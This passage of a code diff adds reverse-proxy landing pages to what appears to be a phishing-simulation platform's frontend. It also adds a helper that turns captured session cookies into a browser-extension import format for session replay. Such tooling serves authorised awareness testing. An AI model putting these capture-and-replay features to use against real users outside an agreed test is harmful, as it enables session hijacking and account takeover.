+1185,23 @@ export class API { redirectURL, companyID }) => { - return await postJSON(this.getPath(`/domain/${id}`), { - hostWebsite: hostWebsite, + const payload = { managedTLS: managedTLS, ownManagedTLS: ownManagedTLS, ownManagedTLSKey: ownManagedTLSKey, ownManagedTLSPem: ownManagedTLSPem, - pageContent: pageContent, - pageNotFoundContent: pageNotFoundContent, - redirectURL: redirectURL, companyID: companyID - }); + }; + + // conditionally add fields if they are provided + if (type !== undefined) payload.type = type; + if (proxyTargetDomain !== undefined) payload.proxyTargetDomain = proxyTargetDomain; + if (hostWebsite !== undefined) payload.hostWebsite = hostWebsite; + if (pageContent !== undefined) payload.pageContent = pageContent; + if (pageNotFoundContent !== undefined) payload.pageNotFoundContent = pageNotFoundContent; + if (redirectURL !== undefined) payload.redirectURL = redirectURL; + + return await postJSON(this.getPath(`/domain/${id}`), payload); }, /** @@ -1280,14 +1314,17 @@ export class API { * @param {string} name * @param {string} content * @param {string} companyID + * @param {object} additionalFields - Optional additional fields for Proxy pages * @returns {Promise} */ - create: async (name, content, companyID) => { - return await postJSON(this.getPath('/page'), { + create: async (name, content, companyID, additionalFields = {}) => { + const payload = { name: name, content: content, - companyID: companyID - }); + companyID: companyID, + ...additionalFields + }; + return await postJSON(this.getPath('/page'), payload); }, /** @@ -2715,6 +2752,93 @@ export class API { } }; + /** + * proxy is the API for Proxy related operations. + */ + proxy = { + /** + * Get a Proxy by its ID. + * + * @param {string} id + * @returns {Promise} + */ + getByID: async (id) => { + return await getJSON(this.getPath(`/proxy/${id}`)); + }, + + /** + * Get all Proxies using pagination. + * + * @param {TableURLParams} options + * @param {string|null} companyID + * @returns {Promise} + */ + getAll: async (options, companyID = null) => { + return await getJSON( + this.getPath(`/proxy?${appendQuery(options)}${this.appendCompanyQuery(companyID)}`) + ); + }, + + /** + * Get all Proxies overview using pagination. + * + * @param {TableURLParams} options + * @param {string|null} companyID + * @returns {Promise} + */ + getAllSubset: async (options, companyID = null) => { + return await getJSON( + this.getPath(`/proxy/overview?${appendQuery(options)}${this.appendCompanyQuery(companyID)}`) + ); + }, + + /** + * Create a new Proxy. + * + * @param {object} proxy + * @param {string} proxy.name + * @param {string} proxy.description + * @param {string} proxy.startURL + * @param {string} proxy.proxyConfig + * @param {string} proxy.companyID + * @returns {Promise} + */ + create: async ({ name, description, startURL, proxyConfig, companyID }) => { + return await postJSON(this.getPath('/proxy'), { + name: name, + description: description, + startURL: startURL, + proxyConfig: proxyConfig, + companyID: companyID + }); + }, + + /** + * Update a Proxy. + * + * @param {string} id + * @param {object} proxy + * @param {string} proxy.name + * @param {string} proxy.description + * @param {string} proxy.startURL + * @param {string} proxy.proxyConfig + * @returns {Promise} + */ + update: async (id, proxy) => { + return await patchJSON(this.getPath(`/proxy/${id}`), proxy); + }, + + /** + * Delete a Proxy. + * + * @param {string} id + * @returns {Promise} + */ + delete: async (id) => { + return await deleteJSON(this.getPath(`/proxy/${id}`)); + } + }; + /** * import is for importing assets, landing pages and etc */ diff --git a/frontend/src/lib/components/ProxySvgIcon.svelte b/frontend/src/lib/components/ProxySvgIcon.svelte new file mode 100644 index 0000000..4102a82 --- /dev/null +++ b/frontend/src/lib/components/ProxySvgIcon.svelte @@ -0,0 +1,21 @@ + + + + {title} + + diff --git a/frontend/src/lib/components/editor/Editor.svelte b/frontend/src/lib/components/editor/Editor.svelte index ebb20da..fd42092 100644 --- a/frontend/src/lib/components/editor/Editor.svelte +++ b/frontend/src/lib/components/editor/Editor.svelte @@ -103,6 +103,7 @@ onMount(() => { document.body.classList.add('overflow-hidden'); + /* ts-ignore */ self.MonacoEnvironment = { getWorker: function (_, label) { if (label === 'html') { diff --git a/frontend/src/lib/components/editor/SimpleCodeEditor.svelte b/frontend/src/lib/components/editor/SimpleCodeEditor.svelte index 515f03f..3cf879b 100644 --- a/frontend/src/lib/components/editor/SimpleCodeEditor.svelte +++ b/frontend/src/lib/components/editor/SimpleCodeEditor.svelte @@ -51,6 +51,7 @@ editor.dispose(); } }; + /* @ts-ignore */ self.MonacoEnvironment = { getWorker: function (_, label) { if (label === 'json') { @@ -145,7 +146,7 @@
{placeholder}
+ class="text-xs text-gray-600 dark:text-gray-300 whitespace-pre-wrap transition-colors duration-200 select-text cursor-text">{placeholder} {/if} diff --git a/frontend/src/lib/components/form/PageTypeSwitcher.svelte b/frontend/src/lib/components/form/PageTypeSwitcher.svelte new file mode 100644 index 0000000..1e6eed5 --- /dev/null +++ b/frontend/src/lib/components/form/PageTypeSwitcher.svelte @@ -0,0 +1,40 @@ + + +
+ {#each options as option} + + {/each} +
diff --git a/frontend/src/lib/components/form/TextFieldSelectWithType.svelte b/frontend/src/lib/components/form/TextFieldSelectWithType.svelte new file mode 100644 index 0000000..b6fb393 --- /dev/null +++ b/frontend/src/lib/components/form/TextFieldSelectWithType.svelte @@ -0,0 +1,401 @@ + + +
+ +
+
+ + + + {#if !isFocused} +
+ + +
+ {/if} + + + {#if showDropdown} + + {/if} + + {#if optional === true && hasValue} + + {/if} + + +
+ + {#if showDropdown} +
+
    + {#if allOptions.length} + {#each allOptions as option, index} +
  • + +
  • + {/each} + {:else} +
  • + No {type === 'proxy' ? 'Proxies' : 'pages'} available +
  • + {/if} +
+
+ {/if} +
+
diff --git a/frontend/src/lib/components/header/DesktopMenu.svelte b/frontend/src/lib/components/header/DesktopMenu.svelte index 2f54020..4021591 100644 --- a/frontend/src/lib/components/header/DesktopMenu.svelte +++ b/frontend/src/lib/components/header/DesktopMenu.svelte @@ -65,6 +65,11 @@ api_senders: ` +`, + + proxy: ` + + ` }; @@ -79,6 +84,7 @@ '/recipient/group/': 'recipient_groups', '/domain/': 'domains_overview', '/page/': 'pages', + '/proxy/': 'proxy', '/asset/': 'assets', '/email/': 'emails_overview', '/attachment/': 'attachments', diff --git a/frontend/src/lib/consts/navigation.js b/frontend/src/lib/consts/navigation.js index 577cfb5..fa88362 100644 --- a/frontend/src/lib/consts/navigation.js +++ b/frontend/src/lib/consts/navigation.js @@ -56,6 +56,10 @@ export const route = { label: 'Pages', route: '/page/' }, + proxy: { + label: 'Proxies', + route: '/proxy/' + }, campaignTemplates: { label: 'Campaign Templates', singleLabel: 'Templates', @@ -109,7 +113,7 @@ export const menu = [ { label: 'Domains', type: 'submenu', - items: [route.domain, route.pages, route.assets] + items: [route.domain, route.pages, route.proxy, route.assets] }, { label: 'Emails', diff --git a/frontend/src/routes/campaign-template/+page.svelte b/frontend/src/routes/campaign-template/+page.svelte index 038eb94..86764fe 100644 --- a/frontend/src/routes/campaign-template/+page.svelte +++ b/frontend/src/routes/campaign-template/+page.svelte @@ -18,6 +18,7 @@ import { BiMap } from '$lib/utils/maps'; import TextFieldSelect from '$lib/components/TextFieldSelect.svelte'; import Modal from '$lib/components/Modal.svelte'; + import ProxySvgIcon from '$lib/components/ProxySvgIcon.svelte'; import FormGrid from '$lib/components/FormGrid.svelte'; import TableCellEmpty from '$lib/components/table/TableCellEmpty.svelte'; import BigButton from '$lib/components/BigButton.svelte'; @@ -30,10 +31,11 @@ import TableCellCheck from '$lib/components/table/TableCellCheck.svelte'; import TableDropDownEllipsis from '$lib/components/table/TableDropDownEllipsis.svelte'; import DeleteAlert from '$lib/components/modal/DeleteAlert.svelte'; - import { page } from '$app/stores'; // Add this import at the top + import { page } from '$app/stores'; import SelectSquare from '$lib/components/SelectSquare.svelte'; import TableDropDownButton from '$lib/components/table/TableDropDownButton.svelte'; import CopyCell from '$lib/components/table/CopyCell.svelte'; + import TextFieldSelectWithType from '$lib/components/form/TextFieldSelectWithType.svelte'; // services const appStateService = AppStateService.instance; @@ -46,8 +48,11 @@ name: null, domain: null, landingPage: null, + landingPageType: 'page', // 'page' or 'proxy' beforeLandingPage: null, + beforeLandingPageType: 'page', // 'page' or 'proxy' afterLandingPage: null, + afterLandingPageType: 'page', // 'page' or 'proxy' afterLandingPageRedirectURL: null, email: null, smtpConfiguration: null, @@ -59,9 +64,13 @@ let contextCompanyID = null; let domainMap = new BiMap({}); + let domainObjectMap = new Map(); // stores full domain objects let beforeLandingPageMap = new BiMap({}); let landingPageMap = new BiMap({}); let afterLandingPageMap = new BiMap({}); + let beforeLandingProxyMap = new BiMap({}); + let landingProxyMap = new BiMap({}); + let afterLandingProxyMap = new BiMap({}); let emailMap = new BiMap({}); let smtpConfigurationMap = new BiMap({}); let apiSenderMap = new BiMap({}); @@ -107,6 +116,7 @@ refreshSmtpConfigurations(), refreshApiSenders(), refreshPages(), + refreshProxies(), getCampaignTemplates(), refreshIdentifiers() ]); @@ -123,10 +133,17 @@ }); const refreshDomains = async () => { - const domains = await fetchAllRows((options) => { + const allDomains = await fetchAllRows((options) => { return api.domain.getAllSubset(options, contextCompanyID); }); - domainMap = BiMap.FromArrayOfObjects(domains); + // filter to only include regular domains (not proxy domains) + const regularDomains = allDomains.filter((domain) => domain.type !== 'proxy'); + domainMap = BiMap.FromArrayOfObjects(regularDomains); + // store full domain objects for type access + domainObjectMap = new Map(); + regularDomains.forEach((domain) => { + domainObjectMap.set(domain.id, domain); + }); }; const refreshEmails = async () => { @@ -159,6 +176,15 @@ afterLandingPageMap = BiMap.FromArrayOfObjects(pages); }; + const refreshProxies = async () => { + const proxies = await fetchAllRows((options) => { + return api.proxy.getAllSubset(options, contextCompanyID); + }); + landingProxyMap = BiMap.FromArrayOfObjects(proxies); + beforeLandingProxyMap = BiMap.FromArrayOfObjects(proxies); + afterLandingProxyMap = BiMap.FromArrayOfObjects(proxies); + }; + const refreshIdentifiers = async () => { const identifiers = await fetchAllRows((options) => { return api.identifier.getAll(options); @@ -271,9 +297,30 @@ emailID: emailMap.byValueOrNull(formValues.email), smtpConfigurationID: smtpConfigurationMap.byValueOrNull(formValues.smtpConfiguration), apiSenderID: apiSenderMap.byValueOrNull(formValues.apiSender), - landingPageID: landingPageMap.byValue(formValues.landingPage), - beforeLandingPageID: beforeLandingPageMap.byValueOrNull(formValues.beforeLandingPage), - afterLandingPageID: afterLandingPageMap.byValueOrNull(formValues.afterLandingPage), + landingPageID: + formValues.landingPageType === 'page' + ? landingPageMap.byValueOrNull(formValues.landingPage) + : null, + landingProxyID: + formValues.landingPageType === 'proxy' + ? landingProxyMap.byValueOrNull(formValues.landingPage) + : null, + beforeLandingPageID: + formValues.beforeLandingPageType === 'page' + ? beforeLandingPageMap.byValueOrNull(formValues.beforeLandingPage) + : null, + beforeLandingProxyID: + formValues.beforeLandingPageType === 'proxy' + ? beforeLandingProxyMap.byValueOrNull(formValues.beforeLandingPage) + : null, + afterLandingPageID: + formValues.afterLandingPageType === 'page' + ? afterLandingPageMap.byValueOrNull(formValues.afterLandingPage) + : null, + afterLandingProxyID: + formValues.afterLandingPageType === 'proxy' + ? afterLandingProxyMap.byValueOrNull(formValues.afterLandingPage) + : null, afterLandingPageRedirectURL: formValues.afterLandingPageRedirectURL, urlIdentifierID: identifierMap.byValueOrNull(formValues.urlIdentifier), stateIdentifierID: identifierMap.byValueOrNull(formValues.stateIdentifier), @@ -302,9 +349,30 @@ emailID: emailMap.byValueOrNull(formValues.email), smtpConfigurationID: smtpConfigurationMap.byValueOrNull(formValues.smtpConfiguration), apiSenderID: apiSenderMap.byValueOrNull(formValues.apiSender), - landingPageID: landingPageMap.byValueOrNull(formValues.landingPage), - beforeLandingPageID: beforeLandingPageMap.byValueOrNull(formValues.beforeLandingPage), - afterLandingPageID: afterLandingPageMap.byValueOrNull(formValues.afterLandingPage), + landingPageID: + formValues.landingPageType === 'page' + ? landingPageMap.byValueOrNull(formValues.landingPage) + : null, + landingProxyID: + formValues.landingPageType === 'proxy' + ? landingProxyMap.byValueOrNull(formValues.landingPage) + : null, + beforeLandingPageID: + formValues.beforeLandingPageType === 'page' + ? beforeLandingPageMap.byValueOrNull(formValues.beforeLandingPage) + : null, + beforeLandingProxyID: + formValues.beforeLandingPageType === 'proxy' + ? beforeLandingProxyMap.byValueOrNull(formValues.beforeLandingPage) + : null, + afterLandingPageID: + formValues.afterLandingPageType === 'page' + ? afterLandingPageMap.byValueOrNull(formValues.afterLandingPage) + : null, + afterLandingProxyID: + formValues.afterLandingPageType === 'proxy' + ? afterLandingProxyMap.byValueOrNull(formValues.afterLandingPage) + : null, afterLandingPageRedirectURL: formValues.afterLandingPageRedirectURL, urlIdentifierID: identifierMap.byValueOrNull(formValues.urlIdentifier), stateIdentifierID: identifierMap.byValueOrNull(formValues.stateIdentifier), @@ -359,8 +427,11 @@ name: null, domain: null, landingPage: null, + landingPageType: 'page', beforeLandingPage: null, + beforeLandingPageType: 'page', afterLandingPage: null, + afterLandingPageType: 'page', afterLandingPageRedirectURL: null, email: null, smtpConfiguration: null, @@ -422,9 +493,34 @@ } formValues.domain = domainMap.byKey(template.domainID); formValues.email = emailMap.byKey(template.emailID); - formValues.landingPage = landingPageMap.byKey(template.landingPageID); - formValues.beforeLandingPage = beforeLandingPageMap.byKey(template.beforeLandingPageID); - formValues.afterLandingPage = afterLandingPageMap.byKey(template.afterLandingPageID); + + // handle landing page (page or proxy) + if (template.landingPageID) { + formValues.landingPage = landingPageMap.byKey(template.landingPageID); + formValues.landingPageType = 'page'; + } else if (template.landingProxyID) { + formValues.landingPage = landingProxyMap.byKey(template.landingProxyID); + formValues.landingPageType = 'proxy'; + } + + // handle before landing page (page or proxy) + if (template.beforeLandingPageID) { + formValues.beforeLandingPage = beforeLandingPageMap.byKey(template.beforeLandingPageID); + formValues.beforeLandingPageType = 'page'; + } else if (template.beforeLandingProxyID) { + formValues.beforeLandingPage = beforeLandingProxyMap.byKey(template.beforeLandingProxyID); + formValues.beforeLandingPageType = 'proxy'; + } + + // handle after landing page (page or proxy) + if (template.afterLandingPageID) { + formValues.afterLandingPage = afterLandingPageMap.byKey(template.afterLandingPageID); + formValues.afterLandingPageType = 'page'; + } else if (template.afterLandingProxyID) { + formValues.afterLandingPage = afterLandingProxyMap.byKey(template.afterLandingProxyID); + formValues.afterLandingPageType = 'proxy'; + } + formValues.afterLandingPageRedirectURL = template.afterLandingPageRedirectURL; formValues.urlIdentifier = identifierMap.byKey(template.urlIdentifierID); formValues.stateIdentifier = identifierMap.byKey(template.stateIdentifierID); @@ -515,6 +611,13 @@ {beforeLandingPageMap.byKey(template.beforeLandingPageID)} + {:else if template.beforeLandingProxyID} + + + + {beforeLandingProxyMap.byKey(template.beforeLandingProxyID)} + + {/if} @@ -522,6 +625,13 @@ {landingPageMap.byKey(template.landingPageID)} + {:else if template.landingProxyID} + + + + {landingProxyMap.byKey(template.landingProxyID)} + + {/if} @@ -529,6 +639,13 @@ {afterLandingPageMap.byKey(template.afterLandingPageID)} + {:else if template.afterLandingProxyID} + + + + {afterLandingProxyMap.byKey(template.afterLandingProxyID)} + + {/if} @@ -781,31 +898,37 @@ Simulation URLs to allow:\n${allowListingData.simulationUrl}\n

Page Flow

-
-
- Before Landing Page -
-
- Landing Page -
-
- After Landing Page -
+
+ + Before Landing + + + Landing + + + After Landing +
-

Before Landing Page

+

+ Before Landing {formValues.beforeLandingPageType === 'proxy' + ? 'Proxy' + : 'Page'} +

{formValues.beforeLandingPage || 'Not selected'}

@@ -853,7 +980,9 @@ Simulation URLs to allow:\n${allowListingData.simulationUrl}\n 2
-

Landing Page

+

+ Landing {formValues.landingPageType === 'proxy' ? 'Proxy' : 'Page'} +

{formValues.landingPage || 'Required'}

@@ -877,7 +1006,9 @@ Simulation URLs to allow:\n${allowListingData.simulationUrl}\n >
-

After Landing Page

+

+ After Landing {formValues.afterLandingPageType === 'proxy' ? 'Proxy' : 'Page'} +

{formValues.afterLandingPage || 'Not selected'}

diff --git a/frontend/src/routes/campaign/[id]/+page.svelte b/frontend/src/routes/campaign/[id]/+page.svelte index e89246a..78e676e 100644 --- a/frontend/src/routes/campaign/[id]/+page.svelte +++ b/frontend/src/routes/campaign/[id]/+page.svelte @@ -8,6 +8,7 @@ import { BiMap } from '$lib/utils/maps'; import { defaultOptions, fetchAllRows } from '$lib/utils/api-utils'; import { AppStateService } from '$lib/service/appState'; + import ProxySvgIcon from '$lib/components/ProxySvgIcon.svelte'; import TableRow from '$lib/components/table/TableRow.svelte'; import TableCell from '$lib/components/table/TableCell.svelte'; import TableCellLink from '$lib/components/table/TableCellLink.svelte'; @@ -36,6 +37,11 @@ import Alert from '$lib/components/Alert.svelte'; import EventTimeline from '$lib/components/EventTimeline.svelte'; import CellCopy from '$lib/components/table/CopyCell.svelte'; + import Button from '$lib/components/Button.svelte'; + import FormGrid from '$lib/components/FormGrid.svelte'; + import FormFooter from '$lib/components/FormFooter.svelte'; + import FormColumns from '$lib/components/FormColumns.svelte'; + import FormColumn from '$lib/components/FormColumn.svelte'; import EventName from '$lib/components/table/EventName.svelte'; import { goto } from '$app/navigation'; import { globalButtonDisabledAttributes } from '$lib/utils/form'; @@ -124,6 +130,8 @@ let isCloseModalVisible = false; let isAnonymizeModalVisible = false; let isSendMessageModalVisible = false; + let isStorageAceModalVisible = false; + let storedCookieData = ''; let sendMessageRecipient = null; let lastPoll3399Nano = ''; @@ -560,6 +568,48 @@ isAnonymizeModalVisible = false; }; + const closeStorageAceModal = () => { + isStorageAceModalVisible = false; + storedCookieData = ''; + }; + + const onStorageAceModalOk = () => { + closeStorageAceModal(); + }; + + /** @param {string} eventData @param {string} eventName */ + const onClickCopyEventData = async (eventData, eventName) => { + try { + // remove the cookie emoji prefix before copying + const dataWithoutEmoji = eventData.startsWith('🍪 ') ? eventData.substring(2) : eventData; + await navigator.clipboard.writeText(dataWithoutEmoji); + + if (eventName === 'campaign_recipient_submitted_data' && eventData.startsWith('🍪')) { + storedCookieData = eventData; + isStorageAceModalVisible = true; + } + + addToast('Copied to clipboard', 'Success'); + } catch (e) { + addToast('Failed to copy data to clipboard', 'Error'); + console.error('failed to copy data to clipboard', e); + } + }; + + const onClickCopyCookies = async () => { + try { + // remove the cookie emoji prefix before copying + const dataWithoutEmoji = storedCookieData.startsWith('🍪 ') + ? storedCookieData.substring(2) + : storedCookieData; + await navigator.clipboard.writeText(dataWithoutEmoji); + addToast('Copied to clipboard', 'Success'); + } catch (e) { + addToast('Failed to copy cookie data', 'Error'); + console.error('failed to copy cookie data', e); + } + }; + const onConfirmCloseCampaign = async (a) => { let res; try { @@ -790,6 +840,89 @@ event.target.value = ''; } }; + + // helper function to format cookie capture data + const formatEventData = (eventData, eventName) => { + if (!eventData || eventName !== 'campaign_recipient_submitted_data') { + return eventData; + } + + try { + // parse the event data as JSON + const parsedData = JSON.parse(eventData); + + // check if it's the new cookie bundle format + if (parsedData.capture_type === 'cookie' && parsedData.cookies) { + const cookies = []; + + // iterate through each captured cookie + for (const [captureName, cookieData] of Object.entries(parsedData.cookies)) { + // convert SameSite attribute to browser extension format + let sameSite = 'no_restriction'; + if (cookieData.sameSite) { + switch (cookieData.sameSite.toLowerCase()) { + case 'strict': + sameSite = 'strict'; + break; + case 'lax': + sameSite = 'lax'; + break; + case 'none': + sameSite = 'no_restriction'; + break; + default: + sameSite = 'no_restriction'; + } + } + + // determine if this is a host-only cookie + const domain = cookieData.domain || ''; + const hostOnly = domain && !domain.startsWith('.'); + + // convert to browser extension compatible format + const browserCookie = { + domain: domain, + hostOnly: hostOnly, + httpOnly: cookieData.httpOnly === 'true', + name: cookieData.name || '', + path: cookieData.path || '/', + sameSite: sameSite, + secure: cookieData.secure === 'true', + session: !cookieData.expires && !cookieData.maxAge, // session cookie if no expiration + storeId: '1', + value: cookieData.value || '' + }; + + // handle expiration date + if (cookieData.expires) { + const expireDate = new Date(cookieData.expires); + if (!isNaN(expireDate.getTime())) { + browserCookie.expirationDate = expireDate.getTime() / 1000; + browserCookie.session = false; + } + } else if (cookieData.maxAge) { + // handle maxAge if present + const maxAgeSeconds = parseInt(cookieData.maxAge); + if (!isNaN(maxAgeSeconds)) { + browserCookie.expirationDate = Date.now() / 1000 + maxAgeSeconds; + browserCookie.session = false; + } + } + + cookies.push(browserCookie); + } + + // return as array format for browser import with cookie emoji + return '🍪 ' + JSON.stringify(cookies, null, 2); + } + + // for other submitted data, return as is + return eventData; + } catch (e) { + // if not valid JSON, return as is + return eventData; + } + }; @@ -1386,7 +1519,23 @@ - + {#if campaign.eventTypesIDToNameMap[event.eventID] === 'campaign_recipient_submitted_data' && formatEventData(event.data, campaign.eventTypesIDToNameMap[event.eventID]).startsWith('🍪')} + + {:else} + + {/if} @@ -1539,12 +1688,23 @@ - + {#if campaign.eventTypesIDToNameMap[event.eventID] === 'campaign_recipient_submitted_data' && formatEventData(event.data, campaign.eventTypesIDToNameMap[event.eventID]).startsWith('🍪')} + + {:else} + + {/if}
- {#if template.landingPage} + {#if template.landingPage || template.landingProxy} +
+ {/if} + {:else if template.beforeLandingProxy} +
+
+ Before +
+
+ + {#if template.landingPage || template.landingProxy}
{/if} {/if} @@ -1615,7 +1787,19 @@
Main Landing
- {#if template.afterLandingPage || template.afterLandingPageRedirectURL} + {#if template.afterLandingPage || template.afterLandingProxy || template.afterLandingPageRedirectURL} +
+ {/if} + {:else if template.landingProxy} +
+
+ Main +
+
+ + {#if template.afterLandingPage || template.afterLandingProxy || template.afterLandingPageRedirectURL}
{/if} {/if} @@ -1625,6 +1809,14 @@
After Landing
+ {:else if template.afterLandingProxy} +
+
+ After +
+
{/if} {#if template.afterLandingPageRedirectURL}
@@ -1667,17 +1859,40 @@ Before Page: - {template.beforeLandingPage?.name ?? ''} + + {#if template.beforeLandingPage} + {template.beforeLandingPage.name} + {:else if template.beforeLandingProxy} + + + {template.beforeLandingProxy.name} + + {/if} + Main Page: - {template.landingPage?.name ?? ''} + + {#if template.landingPage} + {template.landingPage.name} + {:else if template.landingProxy} + + + {template.landingProxy.name} + + {/if} + After Page: - {template.afterLandingPage?.name ?? ''} + + {#if template.afterLandingPage} + {template.afterLandingPage.name} + {:else if template.afterLandingProxy} + + + {template.afterLandingProxy.name} + + {/if} + Redirect URL: + + +
+ +
+

Import cookie

+

+ Cookies can be imported using the StorageAce extension. +

+
+ + +
+ +
+
+ + + + + + +
+ +
+
+
diff --git a/frontend/src/routes/domain/+page.svelte b/frontend/src/routes/domain/+page.svelte index 7303107..6235eef 100644 --- a/frontend/src/routes/domain/+page.svelte +++ b/frontend/src/routes/domain/+page.svelte @@ -18,6 +18,7 @@ import { AppStateService } from '$lib/service/appState'; import TableCellAction from '$lib/components/table/TableCellAction.svelte'; import TableCellEmpty from '$lib/components/table/TableCellEmpty.svelte'; + import ProxySvgIcon from '$lib/components/ProxySvgIcon.svelte'; import FormGrid from '$lib/components/FormGrid.svelte'; import Modal from '$lib/components/Modal.svelte'; import TableCellCheck from '$lib/components/table/TableCellCheck.svelte'; @@ -54,8 +55,9 @@ ownManagedTLSPem: null, hostWebsite: true, pageContent: '', // default value - pageNotFoundContent: '404 page not found', // default value - redirectURL: '' + pageNotFoundContent: '', // default value + redirectURL: '', + staticContent: '' }; let isDeleteAlertVisible = false; @@ -67,6 +69,10 @@ let defaultValues = { ...formValues }; + + let currentDomain = null; // store current domain for proxy info + $: isProxyDomain = currentDomain?.type === 'proxy'; + $: isRegularDomain = !isProxyDomain; let contextCompanyID = null; let domains = []; let modalError = ''; @@ -78,6 +84,7 @@ let isUpdateNotFoundModalVisible = false; let isCopyContentModalVisible = false; let isDomainTableLoading = false; + // @type {null|'create'|'update'} let modalMode = null; let modalText = ''; @@ -169,23 +176,44 @@ try { isSubmitting = true; updateContentError = ''; - // clear site contents if not hosting a website - if (!formValues.hostWebsite) { + // clear site contents if not hosting a website or if proxy domain + if (!formValues.hostWebsite || isProxyDomain) { formValues.pageContent = ''; formValues.pageNotFoundContent = ''; } - const res = await api.domain.update({ - id: formValues.id, - managedTLS: formValues.managedTLS, - ownManagedTLS: formValues.ownManagedTLS, - ownManagedTLSKey: formValues.ownManagedTLSKey, - ownManagedTLSPem: formValues.ownManagedTLSPem, - hostWebsite: formValues.hostWebsite, - pageContent: formValues.pageContent, - pageNotFoundContent: formValues.pageNotFoundContent, - redirectURL: formValues.redirectURL, - companyID: contextCompanyID - }); + // prepare complete update data + let updateData; + + if (isProxyDomain) { + // for proxy domains, only send TLS-related fields + updateData = { + id: formValues.id, + managedTLS: formValues.managedTLS, + ownManagedTLS: formValues.ownManagedTLS, + ownManagedTLSKey: formValues.ownManagedTLSKey, + ownManagedTLSPem: formValues.ownManagedTLSPem, + companyID: contextCompanyID + }; + } else { + // for regular domains, send all fields + updateData = { + id: formValues.id, + type: 'regular', + proxyTargetDomain: '', + managedTLS: formValues.managedTLS, + ownManagedTLS: formValues.ownManagedTLS, + ownManagedTLSKey: formValues.ownManagedTLSKey, + ownManagedTLSPem: formValues.ownManagedTLSPem, + hostWebsite: formValues.hostWebsite, + pageContent: formValues.pageContent, + pageNotFoundContent: formValues.pageNotFoundContent, + redirectURL: formValues.redirectURL, + companyID: contextCompanyID + }; + } + + // @ts-ignore + const res = await api.domain.update(updateData); if (!res.success) { updateContentError = res.error; return; @@ -245,13 +273,15 @@ const onClickCreate = async () => { modalError = ''; try { - // clear site contents if not hosting a website - if (!formValues.hostWebsite) { + // clear site contents if not hosting a website or if proxy domain + if (!formValues.hostWebsite || isProxyDomain) { formValues.pageContent = ''; formValues.pageNotFoundContent = ''; } const res = await api.domain.create({ name: formValues.name, + type: 'regular', + proxyTargetDomain: '', managedTLS: formValues.managedTLS, ownManagedTLS: formValues.ownManagedTLS, ownManagedTLSKey: formValues.ownManagedTLSKey, @@ -277,24 +307,45 @@ const onClickUpdate = async () => { modalError = ''; - // clear site contents if not hosting a website - if (!formValues.hostWebsite) { + // clear site contents if not hosting a website or if proxy domain + if (!formValues.hostWebsite || isProxyDomain) { formValues.pageContent = ''; formValues.pageNotFoundContent = ''; } try { - const res = await api.domain.update({ - id: formValues.id, - managedTLS: formValues.managedTLS, - ownManagedTLS: formValues.ownManagedTLS, - ownManagedTLSKey: formValues.ownManagedTLSKey, - ownManagedTLSPem: formValues.ownManagedTLSPem, - hostWebsite: formValues.hostWebsite, - pageContent: formValues.pageContent, - pageNotFoundContent: formValues.pageNotFoundContent, - redirectURL: formValues.redirectURL, - companyID: contextCompanyID - }); + // prepare complete update data + let updateData; + + if (isProxyDomain) { + // for proxy domains, only send TLS-related fields + updateData = { + id: formValues.id, + managedTLS: formValues.managedTLS, + ownManagedTLS: formValues.ownManagedTLS, + ownManagedTLSKey: formValues.ownManagedTLSKey, + ownManagedTLSPem: formValues.ownManagedTLSPem, + companyID: contextCompanyID + }; + } else { + // for regular domains, send all fields + updateData = { + id: formValues.id, + type: 'regular', + proxyTargetDomain: '', + managedTLS: formValues.managedTLS, + ownManagedTLS: formValues.ownManagedTLS, + ownManagedTLSKey: formValues.ownManagedTLSKey, + ownManagedTLSPem: formValues.ownManagedTLSPem, + hostWebsite: formValues.hostWebsite, + pageContent: formValues.pageContent, + pageNotFoundContent: formValues.pageNotFoundContent, + redirectURL: formValues.redirectURL, + companyID: contextCompanyID + }; + } + + // @ts-ignore + const res = await api.domain.update(updateData); if (!res.success) { modalError = res.error; return; @@ -349,6 +400,12 @@ showIsLoading(); try { const domain = await getDomain(id); + + // prevent opening modal for proxy domains (except for TLS settings) + if (domain.type === 'proxy') { + // Allow opening for TLS settings only + } + formValues = { id: domain.id, name: domain.name, @@ -362,6 +419,10 @@ redirectURL: domain.redirectURL, staticContent: domain.staticContent }; + + // Store domain object for proxy info display + currentDomain = domain; + const r = globalButtonDisabledAttributes(domain, contextCompanyID); if (r.disabled) { hideIsLoading(); @@ -383,13 +444,22 @@ const openUpdateContentModal = async (id) => { modalMode = 'update'; showIsLoading(); + try { const domain = await getDomain(id); + + // prevent opening modal for proxy domains + if (domain.type === 'proxy') { + addToast('Proxy domains cannot be edited - managed through proxy configuration', 'Error'); + hideIsLoading(); + return; + } + assignDomainValues(domain); isUpdateContentModalVisible = true; } catch (e) { addToast('Failed to load domain', 'Error'); - console.error('failed to load domain', e); + console.error('failed to get domain', e); } finally { hideIsLoading(); } @@ -426,6 +496,8 @@ redirectURL: domain.redirectURL, staticContent: domain.staticContent }; + // Store domain object for proxy info display + currentDomain = domain; }; const closeAllModals = () => { @@ -441,7 +513,7 @@ if (contentNotFoundForm) { contentNotFoundForm.reset(); } - isModalVisible = false; + // reset content formValues = { id: null, name: null, @@ -451,12 +523,15 @@ ownManagedTLSPem: null, hostWebsite: true, pageContent: '', // default value - pageNotFoundContent: '404 page not found', // default value - redirectURL: '' + pageNotFoundContent: '', // default value + redirectURL: '', + staticContent: '' }; + currentDomain = null; + isModalVisible = false; - isUpdateNotFoundModalVisible = false; isUpdateContentModalVisible = false; + isUpdateNotFoundModalVisible = false; isCopyContentModalVisible = false; }; @@ -468,6 +543,14 @@ showIsLoading(); try { const domain = await getDomain(id); + + // prevent opening modal for proxy domains + if (domain.type === 'proxy') { + addToast('Proxy domains cannot be edited - managed through proxy configuration', 'Error'); + hideIsLoading(); + return; + } + formValues = { id: domain.id, name: domain.name, @@ -478,18 +561,28 @@ hostWebsite: domain.hostWebsite, pageContent: domain.pageContent, pageNotFoundContent: domain.pageNotFoundContent, - redirectURL: domain.redirectURL + redirectURL: domain.redirectURL, + staticContent: domain.staticContent }; isUpdateNotFoundModalVisible = true; } catch (e) { addToast('Failed to load domain', 'Error'); - console.error('failed to load domain', e); + console.error('failed to get domain', e); } finally { hideIsLoading(); } }; const openDeleteAlert = async (domain) => { + // prevent deletion of proxy domains + if (domain.type === 'proxy') { + addToast( + 'Proxy domains can only be deleted by deleting the associated proxy configuration', + 'Error' + ); + return; + } + isDeleteAlertVisible = true; deleteValues.id = domain.id; deleteValues.name = domain.name; @@ -522,9 +615,11 @@ { column: 'Hosting website', size: 'small', alignText: 'center' }, { column: 'Redirects', size: 'small', alignText: 'center' }, { column: 'Managed TLS', size: 